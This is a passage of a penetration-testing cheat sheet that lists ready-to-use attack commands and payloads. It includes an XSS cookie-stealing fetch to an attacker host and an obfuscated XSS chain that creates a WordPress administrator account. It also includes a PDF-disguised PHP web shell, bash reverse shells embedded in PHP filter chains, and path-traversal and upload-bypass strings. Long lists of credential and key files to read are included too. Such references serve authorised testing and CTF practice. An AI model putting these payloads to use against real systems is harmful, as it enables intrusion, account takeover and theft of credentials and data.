krb5-enum-users.realm='test' \u003cRHOST\u003e\nls -lh /usr/share/nmap/scripts/*ssh*\nlocate -r '\\.nse$' | xargs grep categories | grep categories | grep 'default\\|version\\|safe' | grep smb\n```\n\n#### Port Scanning\n\n```c\nfor p in {1..65535}; do nc -vn \u003cRHOST\u003e $p -w 1 -z \u0026 done 2\u003e \u003cFILE\u003e.txt\n```\n\n```c\nexport ip=\u003cRHOST\u003e; for port in $(seq 1 65535); do timeout 0.01 bash -c \"\u003c/dev/tcp/$ip/$port \u0026\u0026 echo The port $port is open || echo The Port $port is closed \u003e /dev/null\" 2\u003e/dev/null || echo Connection Timeout \u003e /dev/null; done\n```\n\n#### snmpwalk\n\n```c\nsnmpwalk -c public -v1 \u003cRHOST\u003e\nsnmpwalk -v2c -c public \u003cRHOST\u003e 1.3.6.1.2.1.4.34.1.3\nsnmpwalk -v2c -c public \u003cRHOST\u003e .1\nsnmpwalk -v2c -c public \u003cRHOST\u003e nsExtendObjects\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.25\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.25.4.2.1.2\nsnmpwalk -c public -v1 \u003cRHOST\u003e .1.3.6.1.2.1.1.5\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.3.1.1\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.27\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.6.13.1.3\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.25.6.3.1.2\n```\n\n### Web Application Analysis\n\n#### Burp Suite\n\n```c\nCtrl+r // Sending request to repeater\nCtrl+i // Sending request to intruder\nCtrl+Shift+b // base64 encoding\nCtrl+Shift+u // URL decoding\n```\n\n#### Set Proxy Environment Variables\n\n```c\nexport HTTP_PROXY=http://localhost:8080\nexport HTTPS_PROXY=https://localhost:8080\n```\n\n#### cadaver\n\n```c\ncadaver http://\u003cRHOST\u003e/\u003cWEBDAV_DIRECTORY\u003e/\n```\n\n```c\ndav:/\u003cWEBDAV_DIRECTORY\u003e/\u003e cd C\ndav:/\u003cWEBDAV_DIRECTORY\u003e/C/\u003e ls\ndav:/\u003cWEBDAV_DIRECTORY\u003e/C/\u003e put \u003cFILE\u003e\n```\n\n#### Cross-Site Scripting (XSS)\n\n```c\n\u003csCrIpt\u003ealert(1)\u003c/ScRipt\u003e\n\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cscript\u003ealert(document.cookies)\u003c/script\u003e\n\u003cscript\u003edocument.querySelector('#foobar-title').textContent = '\u003cTEXT\u003e'\u003c/script\u003e\n\u003cscript\u003efetch('https://\u003cRHOST\u003e/steal?cookie=' + btoa(document.cookie));\u003c/script\u003e\n\u003cscript\u003euser.changeEmail('user@domain');\u003c/script\u003e\n\u003ciframe src=file:///etc/passwd height=1000px width=1000px\u003e\u003c/iframe\u003e\n\u003cimg src='http://\u003cRHOST\u003e'/\u003e\n```\n\n##### XSS client-Side Attack\n\n###### Request Example\n\n```c\n\u003ca href=\"http://\u003cRHOST\u003e/send_btc?account=\u003cUSERNAME\u003e\u0026amount=100000\"\"\u003efoobar!\u003c/a\u003e\n```\n\n###### Get nonce\n\n```c\nvar ajaxRequest = new XMLHttpRequest();\nvar requestURL = \"/wp-admin/user-new.php\";\nvar nonceRegex = /ser\" value=\"([^\"]*?)\"/g;\najaxRequest.open(\"GET\", requestURL, false);\najaxRequest.send();\nvar nonceMatch = nonceRegex.exec(ajaxRequest.responseText);\nvar nonce = nonceMatch[1];\n```\n\n###### Update Payload Script\n\n```c\nvar params = \"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";\najaxRequest = new XMLHttpRequest();\najaxRequest.open(\"POST\", requestURL, true);\najaxRequest.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\najaxRequest.send(params);\n```\n\n###### Compress Payload Script\n\n\u003e https://jscompress.com/\n\n```c\nvar params=\"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";ajaxRequest=new XMLHttpRequest,ajaxRequest.open(\"POST\",requestURL,!0),ajaxRequest.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\"),ajaxRequest.send(params);\n```\n\n##### Encoding Function\n\n```c\nfunction encode_to_javascript(string) {\n var input = string\n var output = '';\n for(pos = 0; pos \u003c input.length; pos++) {\n output += input.charCodeAt(pos);\n if(pos != (input.length - 1)) {\n output += \",\";\n }\n }\n return output;\n }\n \nlet encoded = encode_to_javascript('var params=\"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";ajaxRequest=new XMLHttpRequest,ajaxRequest.open(\"POST\",requestURL,!0),ajaxRequest.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\"),ajaxRequest.send(params);')\nconsole.log(encoded)\n```\n\n###### Encoded Payload\n\n```c\n118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9\n```\n\n###### Execution\n\n```c\ncurl -i http://\u003cRHOST\u003e --user-agent \"\u003cscript\u003eeval(String.fromCharCode(118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9\n))\u003c/script\u003e\" --proxy 127.0.0.1:8080\n```\n\n#### ffuf\n\n```c\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ --fs \u003cNUMBER\u003e -mc all\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ --fw \u003cNUMBER\u003e -mc all\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ -mc 200,204,301,302,307,401 -o results.txt\nffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://\u003cRHOST\u003e/ -H \"Host: FUZZ.\u003cRHOST\u003e\" -fs 185\nffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://\u003cRHOST\u003e/backups/backup_2020070416FUZZ.zip\n```\n\n##### API Fuzzing\n\n```c\nffuf -u https://\u003cRHOST\u003e/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412\n```\n\n##### Searching for LFI\n\n```c\nffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://\u003cRHOST\u003e/admin../admin_staging/index.php?page=FUZZ -fs 15349\n```\n\n##### Fuzzing with PHP Session ID\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u \"http://\u003cRHOST\u003e/admin/FUZZ.php\" -b \"PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp\" -fw 2644\n```\n\n##### Recursion\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://\u003cRHOST\u003e/cd/basic/FUZZ -recursion\n```\n\n##### File Extensions\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://\u003cRHOST\u003e/cd/ext/logs/FUZZ -e .log\n```\n\n##### Rate Limiting\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://\u003cRHOST\u003e/cd/rate/FUZZ -mc 200,429\n```\n\n##### Virtual Host Discovery\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e -fs 1495\n```\n\n##### Massive File Extension Discovery\n\n```c\nffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://\u003cRHOST\u003e/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip\n```\n\n#### GitTools\n\n```c\n./gitdumper.sh http://\u003cRHOST\u003e/.git/ /PATH/TO/FOLDER\n./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/\n```\n\n#### Gobuster\n\n```c\n-e // extended mode that renders the full url\n-k // skip ssl certificate validation\n-r // follow cedirects\n-s // status codes\n-b // exclude status codes\n-k // ignore certificates\n--wildcard // set wildcard option\n\n$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://\u003cRHOST\u003e/\n$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://\u003cRHOST\u003e/ -x php\n$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://\u003cRHOST\u003e/ -x php,txt,html,js -e -s 200\n$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://\u003cRHOST\u003e:\u003cRPORT\u003e/ -b 200 -k --wildcard\n```\n\n##### Common File Extensions\n\n```c\ntxt,bak,php,html,js,asp,aspx\n```\n\n##### Common Picture Extensions\n\n```c\npng,jpg,jpeg,gif,bmp\n```\n\n##### POST Requests\n\n```c\ngobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://\u003cRHOST\u003e/api/ -e -s 200\n```\n\n##### DNS Recon\n\n```c\ngobuster dns -d \u003cRHOST\u003e -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt\ngobuster dns -d \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt\n```\n\n##### VHost Discovery\n\n```c\ngobuster vhost -u \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt\ngobuster vhost -u \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain\n```\n\n##### Specifiy User Agent\n\n```c\ngobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://\u003cRHOST\u003e/ -a Linux\n```\n\n#### Local File Inclusion (LFI)\n\n```c\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=../../../../../../../../etc/passwd\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e/php?file=../../../../../../../../../../etc/passwd\n```\n##### Until php 5.3\n\n```c\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e/php?file=../../../../../../../../../../etc/passwd%00\n```\n\n##### Null Byte\n\n```c\n%00\n0x00\n```\n\n##### Encoded Traversal Strings\n\n```c\n../\n..\\\n..\\/\n%2e%2e%2f\n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n..././\n...\\.\\\n```\n\n##### php://filter Wrapper\n\n\u003e https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb\n\n\u003e https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n\n\u003e https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter\n\n```c\nurl=php://filter/convert.base64-encode/resource=file:////var/www/\u003cRHOST\u003e/api.php\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?page=php://filter/convert.base64-encode/resource=index\nhttp://\u003cRHOST\u003e/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd\nbase64 -d \u003cFILE\u003e.php\n```\n\n##### Django, Rails, or Node.js Web Application Header Values\n\n```c\nAccept: ../../../../.././../../../../etc/passwd{{\nAccept: ../../../../.././../../../../etc/passwd{%0D\nAccept: ../../../../.././../../../../etc/passwd{%0A\nAccept: ../../../../.././../../../../etc/passwd{%00\nAccept: ../../../../.././../../../../etc/passwd{%0D{{\nAccept: ../../../../.././../../../../etc/passwd{%0A{{\nAccept: ../../../../.././../../../../etc/passwd{%00{{\n```\n\n##### Linux Files\n\n```c\n/app/etc/local.xml\n/etc/passwd\n/etc/shadow\n/etc/aliases\n/etc/anacrontab\n/etc/apache2/apache2.conf\n/etc/apache2/httpd.conf\n/etc/apache2/sites-enabled/000-default.conf\n/etc/at.allow\n/etc/at.deny\n/etc/bashrc\n/etc/bootptab\n/etc/chrootUsers\n/etc/chttp.conf\n/etc/cron.allow\n/etc/cron.deny\n/etc/crontab\n/etc/cups/cupsd.conf\n/etc/exports\n/etc/fstab\n/etc/ftpaccess\n/etc/ftpchroot\n/etc/ftphosts\n/etc/groups\n/etc/grub.conf\n/etc/hosts\n/etc/hosts.allow\n/etc/hosts.deny\n/etc/httpd/access.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/httpd/logs/access_log\n/etc/httpd/logs/access.log\n/etc/httpd/logs/error_log\n/etc/httpd/logs/error.log\n/etc/httpd/php.ini\n/etc/httpd/srm.conf\n/etc/inetd.conf\n/etc/inittab\n/etc/issue\n/etc/knockd.conf\n/etc/lighttpd.conf\n/etc/lilo.conf\n/etc/logrotate.d/ftp\n/etc/logrotate.d/proftpd\n/etc/logrotate.d/vsftpd.log\n/etc/lsb-release\n/etc/motd\n/etc/modules.conf\n/etc/motd\n/etc/mtab\n/etc/my.cnf\n/etc/my.conf\n/etc/mysql/my.cnf\n/etc/network/interfaces\n/etc/networks\n/etc/npasswd\n/etc/passwd\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/cgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php5/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php/apache2/php.ini\n/etc/php/apache/php.ini\n/etc/php/cgi/php.ini\n/etc/php.ini\n/etc/php/php4/php.ini\n/etc/php/php.ini\n/etc/printcap\n/etc/profile\n/etc/proftp.conf\n/etc/proftpd/proftpd.conf\n/etc/pure-ftpd.conf\n/etc/pureftpd.passwd\n/etc/pureftpd.pdb\n/etc/pure-ftpd/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pure-ftpd/putreftpd.pdb\n/etc/redhat-release\n/etc/resolv.conf\n/etc/samba/smb.conf\n/etc/snmpd.conf\n/etc/ssh/ssh_config\n/etc/ssh/sshd_config\n/etc/ssh/ssh_host_dsa_key\n/etc/ssh/ssh_host_dsa_key.pub\n/etc/ssh/ssh_host_key\n/etc/ssh/ssh_host_key.pub\n/etc/sysconfig/network\n/etc/syslog.conf\n/etc/termcap\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/vsftpd.chroot_list\n/etc/vsftpd.conf\n/etc/vsftpd/vsftpd.conf\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/logs/pure-ftpd.log\n/logs/security_debug_log\n/logs/security_log\n/opt/lampp/etc/httpd.conf\n/opt/xampp/etc/php.ini\n/proc/cmdline\n/proc/cpuinfo\n/proc/filesystems\n/proc/interrupts\n/proc/ioports\n/proc/meminfo\n/proc/modules\n/proc/mounts\n/proc/net/arp\n/proc/net/tcp\n/proc/net/udp\n/proc/\u003cPID\u003e/cmdline\n/proc/\u003cPID\u003e/maps\n/proc/sched_debug\n/proc/self/cwd/app.py\n/proc/self/environ\n/proc/self/net/arp\n/proc/stat\n/proc/swaps\n/proc/version\n/root/anaconda-ks.cfg\n/usr/etc/pure-ftpd.conf\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/local/apache/conf/modsec.conf\n/usr/local/apache/conf/php.ini\n/usr/local/apache/log\n/usr/local/apache/logs\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/access.log\n/usr/local/apache/audit_log\n/usr/local/apache/error_log\n/usr/local/apache/error.log\n/usr/local/cpanel/logs\n/usr/local/cpanel/logs/access_log\n/usr/local/cpanel/logs/error_log\n/usr/local/cpanel/logs/license_log\n/usr/local/cpanel/logs/login_log\n/usr/local/cpanel/logs/stats_log\n/usr/local/etc/httpd/logs/access_log\n/usr/local/etc/httpd/logs/error_log\n/usr/local/etc/php.ini\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/lib/php.ini\n/usr/local/php4/httpd.conf\n/usr/local/php4/httpd.conf.php\n/usr/local/php4/lib/php.ini\n/usr/local/php5/httpd.conf\n/usr/local/php5/httpd.conf.php\n/usr/local/php5/lib/php.ini\n/usr/local/php/httpd.conf\n/usr/local/php/httpd.conf.ini\n/usr/local/php/lib/php.ini\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/usr/local/pureftpd/etc/pureftpd.pdn\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/www/logs/httpd_log\n/usr/local/Zend/etc/php.ini\n/usr/sbin/pure-config.pl\n/var/adm/log/xferlog\n/var/apache2/config.inc\n/var/apache/logs/access_log\n/var/apache/logs/error_log\n/var/cpanel/cpanel.config\n/var/lib/mysql/my.cnf\n/var/lib/mysql/mysql/user.MYD\n/var/local/www/conf/php.ini\n/var/log/apache2/access_log\n/var/log/apache2/access.log\n/var/log/apache2/error_log\n/var/log/apache2/error.log\n/var/log/apache/access_log\n/var/log/apache/access.log\n/var/log/apache/error_log\n/var/log/apache/error.log\n/var/log/apache-ssl/access.log\n/var/log/apache-ssl/error.log\n/var/log/auth.log\n/var/log/boot\n/var/htmp\n/var/log/chttp.log\n/var/log/cups/error.log\n/var/log/daemon.log\n/var/log/debug\n/var/log/dmesg\n/var/log/dpkg.log\n/var/log/exim_mainlog\n/var/log/exim/mainlog\n/var/log/exim_paniclog\n/var/log/exim.paniclog\n/var/log/exim_rejectlog\n/var/log/exim/rejectlog\n/var/log/faillog\n/var/log/ftplog\n/var/log/ftp-proxy\n/var/log/ftp-proxy/ftp-proxy.log\n/var/log/httpd-access.log\n/var/log/httpd/access_log\n/var/log/httpd/access.log\n/var/log/httpd/error_log\n/var/log/httpd/error.log\n/var/log/httpsd/ssl.access_log\n/var/log/httpsd/ssl_log\n/var/log/kern.log\n/var/log/lastlog\n/var/log/lighttpd/access.log\n/var/log/lighttpd/error.log\n/var/log/lighttpd/lighttpd.access.log\n/var/log/lighttpd/lighttpd.error.log\n/var/log/mail.info\n/var/log/mail.log\n/var/log/maillog\n/var/log/mail.warn\n/var/log/message\n/var/log/messages\n/var/log/mysqlderror.log\n/var/log/mysql.log\n/var/log/mysql/mysql-bin.log\n/var/log/mysql/mysql.log\n/var/log/mysql/mysql-slow.log\n/var/log/proftpd\n/var/log/pureftpd.log\n/var/log/pure-ftpd/pure-ftpd.log\n/var/log/secure\n/var/log/vsftpd.log\n/var/log/wtmp\n/var/log/xferlog\n/var/log/yum.log\n/var/mysql.log\n/var/run/utmp\n/var/spool/cron/crontabs/root\n/var/webmin/miniserv.log\n/var/www/html\u003cVHOST\u003e/__init__.py\n/var/www/html/db_connect.php\n/var/www/html/utils.php\n/var/www/log/access_log\n/var/www/log/error_log\n/var/www/logs/access_log\n/var/www/logs/error_log\n/var/www/logs/access.log\n/var/www/logs/error.log\n~/.atfp_history\n~/.bash_history\n~/.bash_logout\n~/.bash_profile\n~/.bashrc\n~/.gtkrc\n~/.login\n~/.logout\n~/.mysql_history\n~/.nano_history\n~/.php_history\n~/.profile\n~/.ssh/authorized_keys\n~/.ssh/id_dsa\n~/.ssh/id_dsa.pub\n~/.ssh/id_rsa\n~/.ssh/id_rsa.pub\n~/.ssh/identity\n~/.ssh/identity.pub\n~/.viminfo\n~/.wm_style\n~/.Xdefaults\n~/.xinitrc\n~/.Xresources\n~/.xsession\n```\n\n##### Windows Files\n\n```c\nC:/Users/Administrator/NTUser.dat\nC:/Documents and Settings/Administrator/NTUser.dat\nC:/apache/logs/access.log\nC:/apache/logs/error.log\nC:/apache/php/php.ini\nC:/boot.ini\nC:/inetpub/wwwroot/global.asa\nC:/MySQL/data/hostname.err\nC:/MySQL/data/mysql.err\nC:/MySQL/data/mysql.log\nC:/MySQL/my.cnf\nC:/MySQL/my.ini\nC:/php4/php.ini\nC:/php5/php.ini\nC:/php/php.ini\nC:/Program Files/Apache Group/Apache2/conf/httpd.conf\nC:/Program Files/Apache Group/Apache/conf/httpd.conf\nC:/Program Files/Apache Group/Apache/logs/access.log\nC:/Program Files/Apache Group/Apache/logs/error.log\nC:/Program Files/FileZilla Server/FileZilla Server.xml\nC:/Program Files/MySQL/data/hostname.err\nC:/Program Files/MySQL/data/mysql-bin.log\nC:/Program Files/MySQL/data/mysql.err\nC:/Program Files/MySQL/data/mysql.log\nC:/Program Files/MySQL/my.ini\nC:/Program Files/MySQL/my.cnf\nC:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log\nC:/Program Files/MySQL/MySQL Server 5.0/my.cnf\nC:/Program Files/MySQL/MySQL Server 5.0/my.ini\nC:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf\nC:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf\nC:/Program Files (x86)/Apache Group/Apache/conf/access.log\nC:/Program Files (x86)/Apache Group/Apache/conf/error.log\nC:/Program Files (x86)/FileZilla Server/FileZilla Server.xml\nC:/Program Files (x86)/xampp/apache/conf/httpd.conf\nC:/WINDOWS/php.ini\nC:/WINDOWS/Repair/SAM\nC:/Windows/repair/system\nC:/Windows/repair/software\nC:/Windows/repair/security\nC:/WINDOWS/System32/drivers/etc/hosts\nC:/Windows/win.ini\nC:/WINNT/php.ini\nC:/WINNT/win.ini\nC:/xampp/apache/bin/php.ini\nC:/xampp/apache/logs/access.log\nC:/xampp/apache/logs/error.log\nC:/Windows/Panther/Unattend/Unattended.xml\nC:/Windows/Panther/Unattended.xml\nC:/Windows/debug/NetSetup.log\nC:/Windows/system32/config/AppEvent.Evt\nC:/Windows/system32/config/SecEvent.Evt\nC:/Windows/system32/config/default.sav\nC:/Windows/system32/config/security.sav\nC:/Windows/system32/config/software.sav\nC:/Windows/system32/config/system.sav\nC:/Windows/system32/config/regback/default\nC:/Windows/system32/config/regback/sam\nC:/Windows/system32/config/regback/security\nC:/Windows/system32/config/regback/system\nC:/Windows/system32/config/regback/software\nC:/Program Files/MySQL/MySQL Server 5.1/my.ini\nC:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml\nC:/Windows/System32/inetsrv/config/applicationHost.config\nC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log\n```\n\n#### PDF PHP Inclusion\n\nCreate a file with a PDF header, which contains PHP code.\n\n```c\n%PDF-1.4\n\n\u003c?php\n system($_GET[\"cmd\"]);\n?\u003e\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?page=uploads/\u003cFILE\u003e.pdf%00\u0026cmd=whoami\n```\n\n#### PHP Upload Filter Bypasses\n\n```c\n.sh\n.cgi\n.inc\n.txt\n.pht\n.phtml\n.phP\n.Php\n.php3\n.php4\n.php5\n.php7\n.pht\n.phps\n.phar\n.phpt\n.pgif\n.phtml\n.phtm\n.php%00.jpeg\n```\n\n```c\n\u003cFILE\u003e.php%20\n\u003cFILE\u003e.php%0d%0a.jpg\n\u003cFILE\u003e.php%0a\n\u003cFILE\u003e.php.jpg\n\u003cFILE\u003e.php%00.gif\n\u003cFILE\u003e.php\\x00.gif\n\u003cFILE\u003e.php%00.png\n\u003cFILE\u003e.php\\x00.png\n\u003cFILE\u003e.php%00.jpg\n\u003cFILE\u003e.php\\x00.jpg\nmv \u003cFILE\u003e.jpg \u003cFILE\u003e.php\\x00.jpg\n```\n\n#### PHP Filter Chain Generator\n\n\u003e https://github.com/synacktiv/php_filter_chain_generator\n\n```c\npython3 php_filter_chain_generator.py --chain '\u003c?= exec($_GET[0]); ?\u003e'\npython3 php_filter_chain_generator.py --chain \"\u003c?php echo shell_exec(id); ?\u003e\"\npython3 php_filter_chain_generator.py --chain \"\"\"\u003c?php echo shell_exec(id); ?\u003e\"\"\"\npython3 php_filter_chain_generator.py --chain \"\"\"\"\u003c?php exec(\"\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261'\"\");?\u003e\"\"\"\"\npython3 php_filter_chain_generator.py --chain \"\"\"\"\u003c?php exec(\"\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261'\"\");?\u003e\"\"\"\"\n```\n\n```c\nhttp://\u003cRHOST\u003e/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4\n```\n\n```c\npython3 php_filter_chain_generator.py --chain '\u003c?= exec($_GET[0]); ?\u003e'\n[+] The following gadget chain will generate the following code : \u003c?= exec($_GET[0]); ?\u003e (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)\nphp://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|\u003c--- SNIP ---\u003e|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp\u00260=\u003cCOMMAND\u003e\n```\n\n#### PHP Generic Gadget Chains (PHPGGC)\n\n```c\nphpggc -u --fast-destruct Guzzle/FW1 /dev/shm/\u003cFILE\u003e.txt /PATH/TO/FILE/\u003cFILE\u003e.txt\n```\n\n#### Server-Side Request Forgery (SSRF)\n\n```c\nhttps://\u003cRHOST\u003e/item/2?server=server.\u003cRHOST\u003e/file?id=9\u0026x=\n```\n\n#### Server-Side Template Injection (SSTI)\n\n##### Fuzz String\n\n\u003e https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti\n\n```c\n${{\u003c%[%'\"}}%\\.\n```\n\n##### Magic Payload\n\n\u003e https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee\n\n```c\n{{ ‘’.__class__.__mro__[1].__subclasses__() }}\n```\n\n#### Upload 